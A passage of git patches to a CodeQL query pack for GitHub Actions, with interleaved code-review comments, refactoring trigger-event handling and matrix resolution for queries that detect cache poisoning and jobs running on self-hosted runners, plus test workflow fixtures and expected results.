e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + ) + ) + ) + or + j.getATriggerEvent().getName() = "workflow_call" and + exists(ExternalJob call | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(call) + ) +} + abstract class CacheWritingStep extends Step { } class CacheActionUsesStep extends CacheWritingStep, UsesStep { diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 7bcbe693566c..11da318f474d 100644 
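Review bot: In the `push` and `pull_request_target` arms of `runsOnDefaultBranch`, the `branches` / `branches-ignore` entries are compared by exact string equality against `["main", "master", "default"]`, but those filters take glob patterns, so a workflow with `branches: ['**']` or `branches: ['ma*']` (both of which select the default branch) silently drops out of the results, and a `branches-ignore` glob that covers the default branch is not recognised either. At minimum the wildcard forms should count as a match on the `branches` side, e.g. `e.getAPropertyValue("branches") = ["main", "master", "default", "*", "**"]`, and longer term both lists should go through one small glob-aware helper so the four `pull_request_target` cases stay consistent. Note also that `hasProperty` only holds when at least one scalar value is present, so an empty `branches: []` lands in the "no filtering" case; that is probably the intended reading but deserves a comment.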
--- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -21,19 +21,7 @@ where // Excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch - // TODO: (require to collect trigger types) - // - add push to default branch? - // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - ( - j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) - or - j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.hasTriggerEvent(defaultBranchTriggerEvent()) - ) - ) and + runsOnDefaultBranch(j) and // The job checkouts untrusted code from a pull request j.getAStep() = checkout and ( diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index e02b64e9ec5a..5d739d746d50 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
@@ -21,21 +21,10 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Local where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and + // Excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch - // TODO: (require to collect trigger types) - // - add push to default branch? - // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - ( - j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) - or - j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.hasTriggerEvent(defaultBranchTriggerEvent()) - ) - ) + runsOnDefaultBranch(j) select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From e0d147f39acdfb2d579a85417dea02af73e065f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:13:44 +0200 Subject: [PATCH 262/707] Add On and Event AST nodes Capture information about trigger events on the new On and Event classes --- ql/lib/codeql/actions/Ast.qll | 24 +++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 93 +++++++++++++++---- .../CodeExecutionOnSelfHostedRunner.ql | 2 +- 3 files changed, 96 insertions(+), 23 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5daa99d142ee..1e57c8f3d29d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -254,13 +254,13 @@ class Workflow extends AstNode instanceof WorkflowImpl { Job getJob(string jobId) { result = super.getJob(jobId) } - predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - - string getATriggerEvent() { result = super.getATriggerEvent() } + Event getATriggerEvent() { result = super.getATriggerEvent() } Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + On getOn() { result = super.getOn() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -305,6 +305,20 @@ class Needs extends AstNode instanceof NeedsImpl { Job getANeededJob() { result = super.getANeededJob() } } +class On extends AstNode instanceof OnImpl { + Event getAnEvent() { result = super.getAnEvent() } +} + +class Event extends AstNode instanceof EventImpl { + string getName() { result = super.getName() } + + string getAnActivityType() { result = super.getAnActivityType() } + + string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } + + predicate hasProperty(string prop) { super.hasProperty(prop) } +} + /** * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. @@ -328,9 +342,7 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } - predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - - string getATriggerEvent() { result = super.getATriggerEvent() } + Event getATriggerEvent() { result = super.getATriggerEvent() } Strategy getStrategy() { result = super.getStrategy() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index fca9298794f7..e8a92a411423 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
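Review bot: The new public `On` and `Event` classes in the `@@ -305` hunk are exported API but carry no QLDoc, while the neighbouring `Job` class has a doc comment, and the contracts of `getAPropertyValue` / `hasProperty` are not obvious from their names. I would add `/** The \`on\` block of a workflow: the set of events that trigger it. */` on `On`, `/** One trigger event listed under \`on\`, e.g. \`push\` or \`pull_request_target\`. */` on `Event`, and on `getAPropertyValue` / `hasProperty` a sentence stating that only scalar entries under the property are returned, so `hasProperty` does not hold for an empty or non-scalar value. Removing `hasTriggerEvent(string)` and changing `getATriggerEvent()` from `string` to `Event` is a breaking change for any external query; a note in the commit message or a deprecated shim would help downstream users.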
@@ -68,6 +68,16 @@ private newtype TAstNode = TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TOnNode(YamlMappingLikeNode n) { exists(YamlMapping w | w.lookup("on") = n) } or + TEventNode(YamlScalar event, YamlMappingLikeNode n) { + exists(OnImpl o | + o.getNode().(YamlMapping).maps(event, n) + or + o.getNode().(YamlSequence).getAChildNode() = event and event = n + or + o.getNode().(YamlScalar) = n and event = n + ) + } or TStepNode(YamlMapping n) { exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) } or @@ -308,6 +318,9 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override YamlMapping getNode() { result = n } + /** Gets the `on` trigger events for this workflow. */ + OnImpl getOn() { result.getNode() = n.lookup("on") } + /** Gets the 'global' `env` mapping in this workflow. */ EnvImpl getEnv() { result.getNode() = n.lookup("env") } @@ -323,15 +336,8 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } - /** Workflow is triggered by given trigger event */ - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) - } - /** Gets the trigger event that starts this workflow. */ - string getATriggerEvent() { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) - } + EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } 
@@ -573,6 +579,66 @@ class NeedsImpl extends AstNodeImpl, TNeedsNode { } } +class OnImpl extends AstNodeImpl, TOnNode { + YamlMappingLikeNode n; + + OnImpl() { this = TOnNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "OnImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets an event that triggers the workflow. */ + EventImpl getAnEvent() { result.getParentNode() = this } +} + +class EventImpl extends AstNodeImpl, TEventNode { + YamlScalar e; + YamlMappingLikeNode n; + + EventImpl() { this = TEventNode(e, n) } + + override string toString() { result = e.getValue() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override OnImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EventImpl" } + + override Location getLocation() { result = e.getLocation() } + + override YamlScalar getNode() { result = e } + + /** Gets the name of the event that triggers the workflow. */ + string getName() { result = e.getValue() } + + /** Gets the Yaml Node associated with the event if any */ + YamlMappingLikeNode getValueNode() { result = n } + + /** Gets an activity type */ + string getAnActivityType() { + result = + n.(YamlMapping).lookup("types").(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Gets a string value for any property (eg: branches, branches-ignore, etc.) 
*/ + string getAPropertyValue(string prop) { + result = n.(YamlMapping).lookup(prop).(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Holds if the event has a property with the given name */ + predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } +} + class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; @@ -686,7 +752,7 @@ class JobImpl extends AstNodeImpl, TJobNode { // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. // The Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] + not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] or // The Workflow is only triggered by `workflow_call` and there is // a caller workflow triggered by an event other than `pull_request` @@ -701,16 +767,11 @@ class JobImpl extends AstNodeImpl, TJobNode { count(this.getATriggerEvent()) > 1 } - /** Workflow is triggered by given trigger event */ - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) - } - /** Gets the trigger event that starts this workflow. */ - string getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and + this.getATriggerEvent().getName() = trigger and count(this.getATriggerEvent()) = 1 } diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index c7bdfbbc323c..90997f63631c 100644 
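Review bot: `OnImpl.getAChildNode` and `EventImpl.getAChildNode` (hunk `@@ -573`, which starts on the previous line) use the reflexive closure `n.getAChildNode*()`, so every AST node whose `getNode()` is `n` itself qualifies as a child — that always includes the `OnImpl` itself, and for the scalar and sequence forms of `TEventNode`, where `event = n`, the `EventImpl` itself as well. The result is a self-referential `getParentNode()`, which is the likely origin of the repeated `issue_comment | issue_comment` and `push | push` rows added to `test.expected` in this series. Rather than the closure, define `EventImpl.getParentNode()` by mirroring the three `TEventNode` alternatives on the candidate `OnImpl`'s node, define `OnImpl.getAChildNode()` as the events whose parent is `this`, and exclude `this` from `EventImpl.getAChildNode()`; the expected files would then need regenerating.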
--- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -21,7 +21,7 @@ import codeql.actions.dataflow.ExternalFlow */ predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | - job.getEnclosingWorkflow().getATriggerEvent() = + job.getEnclosingWorkflow().getATriggerEvent().getName() = ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and label = job.getARunsOnLabel() and // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 From 510cefecbe1e678bb6be20fc5baa7310a38a2a42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:59:12 +0200 Subject: [PATCH 263/707] Remove debug left-overs --- .../actions/security/CachePoisoningQuery.qll | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 5ac2a855e9f4..ab0f2d0809a7 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,14 +10,7 @@ string defaultBranchTriggerEvent() { ] } -predicate test(Event e) { - e.getName() = "pull_request_target" and - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] -} +string defaultBranchNames() { result = ["main", "master", "default"] } predicate runsOnDefaultBranch(Job j) { exists(Event e | 
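Review bot: `defaultBranchNames()` lists `"default"` next to `main` and `master`, but as far as I can tell GitHub does not resolve `default` as an alias for the repository's default branch in `branches:` filters, so a workflow with `branches: [default]` would be reported even though it never runs in the default-branch context. Either drop `"default"` or document the assumption on the predicate, e.g. `/** Names assumed to denote the repository's default branch. Heuristic: the real default branch name is not available in the database. */`. The same set feeds the `branches-ignore` checks, so a default branch under any other name is not recognised there and such workflows are still reported; the comment should say that too.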
@@ -27,7 +20,7 @@ predicate runsOnDefaultBranch(Job j) { not e.getName() = "pull_request_target" or e.getName() = "push" and - e.getAPropertyValue("branches") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() or e.getName() = "pull_request_target" and ( @@ -37,18 +30,18 @@ predicate runsOnDefaultBranch(Job j) { // only branches-ignore filter e.hasProperty("branches-ignore") and not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() or // only branches filter e.hasProperty("branches") and not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() or // branches and branches-ignore filters e.hasProperty("branches") and e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) ) From 9310150fb027ad6e85bcb266091b4093eb833eba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 09:20:45 +0200 Subject: [PATCH 264/707] Resolve conflict --- ql/lib/codeql/actions/ast/internal/Ast.qll | 100 ++++++++++++++---- .../actions/security/SelfHostedQuery.qll | 34 ++++++ .../CodeExecutionOnSelfHostedRunner.ql | 31 +----- .../CWE-284/.github/workflows/test1.yml | 66 ++++++++++++ .../CodeExecutionOnSelfHostedRunner.expected | 6 +- 5 files changed, 186 insertions(+), 51 deletions(-) create mode 100644 ql/lib/codeql/actions/security/SelfHostedQuery.qll diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e8a92a411423..5e4f078bc3ac 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll 
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -544,9 +544,15 @@ class StrategyImpl extends AstNodeImpl, TStrategyNode { override YamlMapping getNode() { result = n } - /** Gets a specific matric expression (YamlMapping) by name. */ - ExpressionImpl getMatrixVarExpr(string name) { - n.lookup("matrix").(YamlMapping).lookup(name) = result.getNode() + YamlMapping getMatrix() { result = n.lookup("matrix") } + + /** Gets a specific matrix expression (YamlMapping) by name. */ + ExpressionImpl getMatrixVarExpr(string accessPath) { + exists(MatrixAccessPathImpl p, ScalarValueImpl v | + p.toString() = accessPath and + resolveMatrixAccessPath(n.lookup("matrix"), p).getNode(_) = v.getNode() and + result.getParentNode() = v + ) } /** Gets a specific matric expression (YamlMapping) by name. */ @@ -777,14 +783,27 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the runs-on field of the job. */ string getARunsOnLabel() { - exists(string lbl, YamlNode r | + exists(ScalarValueImpl lbl | ( - r = runson.getNode(lbl) and - not lbl = ["group", "labels"] + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") or - r = runson.getNode("labels").(YamlMappingLikeNode).getNode(lbl) + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) ) and - result = lbl.trim().regexpReplaceAll("^('|\")", "").regexpReplaceAll("('|\")$", "").trim() + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) + ) ) } } 
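Review bot: In the rewritten `getARunsOnLabel`, a `runs-on: ${{ matrix.os }}` whose matrix is not a literal mapping (for example `matrix: ${{ fromJSON(needs.prep.outputs.matrix) }}`) produces no `getLiteralValues()` and therefore no label at all, so `staticallyIdentifiedSelfHostedRunner` never fires for that job — a silent false negative in exactly the dynamic-matrix setups where self-hosted labels are common. A direct non-matrix expression such as `${{ github.repository }}` is, by contrast, kept verbatim and reported (test9 in the new test file), so the two cases are treated inconsistently. Consider falling back to the raw text when the matrix expression resolves to nothing: `or exists(MatrixExpressionImpl e | e.getParentNode() = lbl and not exists(e.getLiteralValues()) and result = lbl.getValue())`, or at least document the gap on the predicate. Both `StrategyImpl` and `JobImpl` extend outside the hunk.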
@@ -1050,7 +1069,7 @@ private string jobsCtxRegex() { private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } +private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.(.+)") } private string inputsCtxRegex() { result = 
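Review bot: `matrixCtxRegex()` now captures `matrix\\.(.+)`, so everything after `matrix.` up to the end of the normalised expression becomes the `fieldAccess`, operators and arguments included — `matrix.os || 'ubuntu-latest'` or `matrix.os == 'x'` yield an access path that `resolveMatrixAccessPath` cannot find, and the job ends up with no label. Restricting the capture to a dotted identifier path keeps the new nested-access support without that regression: `private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+(?:\\.[A-Za-z0-9_-]+)*)") }`. Whether `wrapRegexp` already anchors the pattern is not visible here, so the exact form may need adjusting.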
@@ -1224,24 +1243,65 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { * e.g. `${{ matrix.foo }}` */ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { - string fieldName; + string fieldAccess; MatrixExpressionImpl() { Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + fieldAccess = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } - override string getFieldName() { result = fieldName } + override string getFieldName() { result = fieldAccess } override AstNodeImpl getTarget() { - exists(WorkflowImpl w | - w.getStrategy().getMatrixVarExpr(fieldName) = result and - w.getAChildNode*() = this - ) - or - exists(JobImpl j | - j.getStrategy().getMatrixVarExpr(fieldName) = result and - j.getAChildNode*() = this + result = this.getEnclosingWorkflow().getStrategy().getMatrixVarExpr(fieldAccess) or + result = this.getEnclosingJob().getStrategy().getMatrixVarExpr(fieldAccess) + } + + string getLiteralValues() { + exists(StrategyImpl s, MatrixAccessPathImpl p, ScalarValueImpl v | + (s = this.getEnclosingJob().getStrategy() or s = this.getEnclosingWorkflow().getStrategy()) and + p.toString() = fieldAccess and + resolveMatrixAccessPath(s.getMatrix(), p).getNode(_) = v.getNode() and + // Exclude values containing matrix expressions to avoid recursion + not exists(MatrixExpressionImpl e | e.getParentNode() = v) and + result = v.getValue() ) } } + +bindingset[accessPath] +string explodeAccessPath(string accessPath) { + result = accessPath or + result = accessPath.suffix(accessPath.indexOf(".") + 1) or + result = accessPath.prefix(accessPath.indexOf(".")) +} + +private newtype TAccessPath = + TMatrixAccessPathNode(string accessPath) { + exists(MatrixExpressionImpl e | accessPath = explodeAccessPath(e.getFieldName())) + } + +class MatrixAccessPathImpl extends TMatrixAccessPathNode { + string accessPath; + + MatrixAccessPathImpl() { 
this = TMatrixAccessPathNode(accessPath) } + + string toString() { result = accessPath } +} + +private YamlMappingLikeNode resolveMatrixAccessPath( + YamlMappingLikeNode root, MatrixAccessPathImpl accessPath +) { + // access path contains no dots. eg: "os" + result = root.getNode(accessPath.toString()) + or + // access path contains dots. eg: "plaform.os" + exists(MatrixAccessPathImpl first, MatrixAccessPathImpl rest, YamlMappingLikeNode newRoot | + first.toString() = accessPath.toString().splitAt(".", 0) and + rest.toString() = accessPath.toString().suffix(first.toString().length() + 1) and + newRoot = root.getNode(first.toString()) and + if newRoot instanceof YamlSequence + then result = resolveMatrixAccessPath(newRoot.(YamlSequence).getElementNode(_), rest) + else result = resolveMatrixAccessPath(newRoot, rest) + ) +} diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll new file mode 100644 index 000000000000..94c6c49a34b0 --- /dev/null +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll 
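Review bot: `resolveMatrixAccessPath` (hunk `@@ -1224`, which starts on the previous line) only looks the path up under the top-level matrix keys, so labels introduced through `include:` — e.g. `matrix: { include: [ { os: self-hosted } ] }` with `runs-on: ${{ matrix.os }}` — are never resolved, the job gets no `runs-on` label, and it is not reported as self-hosted. That is a common way to add a single self-hosted configuration to an otherwise hosted matrix, so unless `include` is handled elsewhere this is a real gap. Adding an alternative that also descends into `include` entries would close it: `or result = resolveMatrixAccessPath(root.getNode("include").(YamlSequence).getElementNode(_), accessPath)`. The guard `not exists(MatrixExpressionImpl e | e.getParentNode() = v)` in `getLiteralValues` prevents recursion through nested `matrix.*` values but also silently drops them; a one-line comment saying this is intentional would help the next reader.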
@@ -0,0 +1,34 @@ +import actions +import codeql.actions.dataflow.ExternalFlow + +string selfHostedRunnerRegexp() { + // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 + result = + "(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$" +} + +/** + * This predicate uses data available in the workflow file to identify self-hosted runners. + * It does not know if the repository is public or private. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate staticallyIdentifiedSelfHostedRunner(Job job) { + exists(string label | + job.getATriggerEvent() = + ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + label = job.getARunsOnLabel() and + not label.regexpMatch(selfHostedRunnerRegexp()) + ) +} + +/** + * This predicate uses data available in the job log files to identify self-hosted runners. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { + exists(string runner_info | + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), + "public", job.getId(), _, _, runner_info) and + runner_info.indexOf("self-hosted:true") > 0 + ) +} diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index 90997f63631c..621b7fb050db 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql 
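Review bot: `dynamicallyIdentifiedSelfHostedRunner` now tests `runner_info.indexOf("self-hosted:true") > 0`, which is an off-by-one: `indexOf` yields the 0-based positions of each occurrence, so a `runner_info` value that begins with `self-hosted:true` is not matched. Use `runner_info.indexOf("self-hosted:true") >= 0` or, more readably, `runner_info.matches("%self-hosted:true%")`. The shape of `runner_info` is not visible here, so this may be latent rather than active, but the corrected form is no more expensive. `selfHostedRunnerRegexp()` is an allow-list of GitHub-hosted labels, so any hosted label outside it is reported as self-hosted; that conservative default is reasonable but should be stated in the QLDoc of `staticallyIdentifiedSelfHostedRunner`.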
@@ -11,36 +11,7 @@ * external/cwe/cwe-284 */ -import actions -import codeql.actions.dataflow.ExternalFlow - -/** - * This predicate uses data available in the workflow file to identify self-hosted runners. - * It does not know if the repository is public or private. - * It is a best-effort approach to identify self-hosted runners. - */ -predicate staticallyIdentifiedSelfHostedRunner(Job job) { - exists(string label | - job.getEnclosingWorkflow().getATriggerEvent().getName() = - ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and - label = job.getARunsOnLabel() and - // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 - not label - .regexpMatch("(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$") - ) -} - -/** - * This predicate uses data available in the job log files to identify self-hosted runners. - * It is a best-effort approach to identify self-hosted runners. - */ -predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { - exists(string runner_info | - workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), - "public", job.getId(), _, _, runner_info) and - runner_info.matches("self-hosted:true") - ) -} +import codeql.actions.security.SelfHostedQuery from Job job where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 81d614e51223..37eb2bddb58c 100644 --- a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml 
@@ -26,3 +26,69 @@ jobs: runs-on: self-hosted-azure steps: - run: cmd + test5: + strategy: + fail-fast: false + matrix: + platform: + - name: Linux + os: ubuntu-latest + shell: bash + - name: macOS + os: macos-latest + shell: bash + - name: Windows + os: windows-latest + shell: cmd + node-version: + - 16.14.0 + - 16.x + - 18.0.0 + - 18.x + - 20.x + runs-on: ${{ matrix.platform.os }} + steps: + - run: cmd + test6: + strategy: + matrix: + os: [ubuntu-latest, macos-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test7: + strategy: + matrix: + os: [self-hosted, ubuntu-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test8: + strategy: + matrix: + settings: + - host: + - 'self-hosted' + - 'macos' + - 'arm64' + target: 'x86_64-apple-darwin' + runs-on: ${{ matrix.settings.host }} + steps: + - run: cmd + test9: + strategy: + matrix: + os: ${{ github.repository }} + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test10: + strategy: + matrix: + os: ${{ github.repository }} + foo: + - bar: ${{ github.repository }} + baz: "asdf" + runs-on: ${{ matrix.foo.bar }} + steps: + - run: cmd diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected index 920a818ab351..306bed9baec1 100644 --- a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected +++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected 
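Review bot: The new matrix jobs test5 through test10 carry no indication of which ones the query is expected to report, and the expectation is only recoverable from the .expected file. A one-line comment above each job stating the intent, e.g. `# not reported: every matrix value is a GitHub-hosted label` on test5/test6 and `# reported: matrix contains a self-hosted label` on test7/test8, and `# reported: runs-on resolves from an unresolvable expression` on test9/test10, would make the fixture readable on its own and make later regressions in the expected file reviewable.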
@@ -1,4 +1,8 @@ | .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner | | .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner | | .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner | -| .github/workflows/test1.yml:26:5:28:15 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:26:5:29:2 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:60:5:66:2 | Job: test7 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:67:5:78:2 | Job: test8 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:79:5:85:2 | Job: test9 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:86:5:94:15 | Job: test10 | Job runs on self-hosted runner | From 9ee9314cb962c8052c41dfded556fe18cf793ee1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 10:37:42 +0200 Subject: [PATCH 265/707] Resolve conflicts after rebasing --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll 